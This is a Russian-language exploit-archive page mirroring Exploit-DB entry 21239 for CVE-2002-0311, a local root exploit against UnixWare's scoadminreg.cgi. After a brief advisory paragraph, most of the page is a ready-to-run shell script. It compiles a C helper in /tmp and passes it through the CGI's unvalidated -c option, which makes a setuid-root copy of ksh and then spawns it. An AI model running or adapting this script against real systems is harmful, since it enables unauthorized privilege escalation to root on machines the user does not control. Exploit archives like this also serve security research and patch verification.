- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 21239
- Проверка EDB
-
- Пройдено
- Автор
- JGGM
- Тип уязвимости
- LOCAL
- Платформа
- UNIXWARE
- CVE
- cve-2002-0311
- Дата публикации
- 2002-01-20
Код:
source: https://www.securityfocus.com/bid/3936/info
UnixWare is a commercial Unix implementation distributed originally developed by SCO. It is now maintained and distributed by Caldera.
The scoadminreg.cgi program does not properly validate user input when executed with the -c option. Because of this, a user may load an arbitrary program with the -c flag. When this program is executed, the file loaded with the -c flag will be executed with administrative privileges.
#!/bin/sh
## [email protected]
CC="gcc"
SCOADMIN=/opt/webtop/bin/i3un0212/cgi-
bin/admin/scoadminreg.cgi
#
#
#
#
echo
echo "jGgM root exploit"
echo "http://www.netemperor.com/"
echo
echo "Mail: [email protected]"
echo
if [ ! -x $SCOADMIN ]; then
echo "$SCOADMIN file not found"
exit 2;
fi
cat >/tmp/jggm.c <<_EOF
main()
{
setuid(0);
setgid(0);
chown("/tmp/jGgM_Shell", 0, 0);
chmod("/tmp/jGgM_Shell", 04755);
}
_EOF
cp /bin/ksh /tmp/jGgM_Shell
$CC -o /tmp/jggm /tmp/jggm.c
$SCOADMIN "-c /tmp/jggm;/tmp/jggm;"
rm -rf /tmp/jggm /tmp/jggm.c
/tmp/jGgM_Shell
# end of file..- Источник
- www.exploit-db.com
